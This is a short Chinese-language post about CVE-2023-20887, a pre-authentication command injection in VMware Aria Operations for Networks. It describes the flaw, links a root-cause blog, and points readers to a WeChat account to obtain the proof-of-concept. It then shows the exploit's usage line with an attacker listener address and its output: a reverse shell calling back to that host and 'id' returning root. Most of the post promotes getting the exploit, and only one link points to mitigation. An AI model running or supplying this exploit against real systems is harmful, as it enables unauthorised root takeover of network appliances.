漏洞简介

VMWare Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时容易受到命令注入的攻击。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受可以绕过的反向代理保护。VMware 已将此问题的严重性评估为处于严重严重性范围内，最高 CVSSv3 基本分数为 9.8。恶意行为者可以在设备的“root”上下文中远程执行代码。VMWare 6.x 版本易受攻击。

该漏洞的根本原因分析可以在我的博客上找到：

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

关注【Hack分享吧】公众号，回复关键字【230619】获取下载链接

POC使用

python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

缓解措施

https://www.vmware.com/security/advisories/VMSA-2023-0012.html